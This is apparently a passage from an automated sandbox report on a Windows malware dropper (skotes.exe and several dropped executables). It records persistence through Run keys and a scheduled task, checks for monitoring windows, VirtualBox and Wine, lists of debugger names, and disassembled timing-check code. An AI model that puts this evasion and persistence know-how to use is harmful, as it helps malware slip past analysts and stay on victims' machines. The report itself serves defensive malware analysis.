                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 142c991362.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 142c991362.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 35f0a75b93.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2e4e1b8516.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 54682ac64c.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12381
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9709
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSystem information queried: FirmwareTableInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSystem information queried: FirmwareTableInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: PROCMON.EXE
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: X64DBG.EXE
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: WINDBG.EXE
                              Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: WIRESHARK.EXE
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF57E second address: 8BF582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF582 second address: 8BF586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF586 second address: 8BEE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F0E6551CA3Ch 0x0000000f push dword ptr [ebp+122D0361h] 0x00000015 pushad 0x00000016 mov edx, 453CDEBDh 0x0000001b mov dword ptr [ebp+122D35C1h], esi 0x00000021 popad 0x00000022 call dword ptr [ebp+122D2034h] 0x00000028 pushad 0x00000029 jmp 00007F0E6551CA46h 0x0000002e mov dword ptr [ebp+122D2273h], edx 0x00000034 xor eax, eax 0x00000036 jmp 00007F0E6551CA43h 0x0000003b mov dword ptr [ebp+122D2273h], edx 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jmp 00007F0E6551CA3Eh 0x0000004a mov dword ptr [ebp+122D2D98h], eax 0x00000050 jmp 00007F0E6551CA48h 0x00000055 mov esi, 0000003Ch 0x0000005a clc 0x0000005b cld 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007F0E6551CA46h 0x00000065 lodsw 0x00000067 jp 00007F0E6551CA3Ch 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 mov eax, 3F34A5C6h 0x00000077 mov dx, ECF7h 0x0000007b popad 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 stc 0x00000081 nop 0x00000082 pushad 0x00000083 jmp 00007F0E6551CA44h 0x00000088 jns 00007F0E6551CA3Ch 0x0000008e popad 0x0000008f push eax 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 push ebx 0x00000094 pop ebx 0x00000095 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ED60 second address: A3EDAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0E647B60A3h 0x0000000f jmp 00007F0E647B6086h 0x00000014 jmp 00007F0E647B6087h 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDAF second address: A3EDB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDB4 second address: A3EDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDC2 second address: A3EDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDC6 second address: A3EDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F2C2 second address: A3F2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5B8 second address: A3F5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5BE second address: A3F5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5CA second address: A3F5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F5CF second address: A3F5D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4237B second address: A4237F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4237F second address: A423AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D20FDh] 0x00000011 push 00000000h 0x00000013 adc esi, 5BBD80A2h 0x00000019 call 00007F0E6551CA39h 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A423AB second address: A423ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007F0E647B607Ch 0x00000012 jng 00007F0E647B6076h 0x00000018 jmp 00007F0E647B607Bh 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E647B6081h 0x0000002a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A423ED second address: A42400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jo 00007F0E6551CA54h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42400 second address: A42404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42404 second address: A4242F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E6551CA3Fh 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4242F second address: A42439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0E647B6076h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42439 second address: A424C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0E6551CA38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 pushad 0x00000024 or dword ptr [ebp+122D35D6h], esi 0x0000002a add dword ptr [ebp+122D35A6h], eax 0x00000030 popad 0x00000031 push 00000003h 0x00000033 mov di, cx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0E6551CA38h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jmp 00007F0E6551CA47h 0x00000057 push 00000003h 0x00000059 mov esi, dword ptr [ebp+122D2AA8h] 0x0000005f call 00007F0E6551CA39h 0x00000064 pushad 0x00000065 push esi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A424C7 second address: A424D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A424D0 second address: A424D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A424D4 second address: A424D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A424D8 second address: A42543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0E6551CA3Eh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jc 00007F0E6551CA42h 0x00000017 jg 00007F0E6551CA3Ch 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jns 00007F0E6551CA38h 0x00000026 jnc 00007F0E6551CA3Ch 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jmp 00007F0E6551CA3Dh 0x00000036 pop eax 0x00000037 pushad 0x00000038 adc ch, FFFFFFF9h 0x0000003b mov esi, ebx 0x0000003d popad 0x0000003e lea ebx, dword ptr [ebp+1245728Ch] 0x00000044 mov esi, eax 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42543 second address: A4254C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4254C second address: A4256B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0E6551CA36h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E6551CA40h 0x00000014 rdtsc
